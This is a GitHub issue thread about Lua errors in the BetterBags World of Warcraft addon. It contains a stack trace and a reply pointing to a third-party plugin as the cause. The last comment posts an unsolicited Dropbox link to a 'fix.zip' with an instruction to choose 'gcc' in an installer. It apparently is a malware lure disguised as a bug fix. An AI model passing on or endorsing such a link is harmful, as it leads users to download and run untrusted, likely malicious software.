### ISSUE TITLE
LUA Errors

### ISSUE THREAD

**Issue by Saviorself300** [Cidan/BetterBags#635]
### Addon Version

v0.2.2

### World of Warcraft Version

Retail

### Describe the bug

Getting message that there are too many errors in my UI. 

96x BetterBags_Bound/filter.lua:162: attempt to index local 'data' (a nil value)
[string "=[C]"]: in function `xpcall'
[string "@BetterBags/data/categories.lua"]:397: in function `GetCustomCategory'
[string "@BetterBags/data/items.lua"]:737: in function `GetCategory'
[string "@BetterBags/data/items.lua"]:452: in function `LoadItems'
[string "@BetterBags/data/items.lua"]:518: in function <BetterBags/data/items.lua:512>
[string "@BetterBags/data/loader.lua"]:95: in function `cb'
[string "@BetterBags/core/async.lua"]:52: in function <BetterBags/core/async.lua:44>

Locals:

### Steps to reproduce

Not sure how to reproduce it.

**Comment by AMaribo** [comment]
This error is from the `BetterBags - BoE, WoE, and BoA` plugin. You'll need to reach out to the author of that addon for support.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
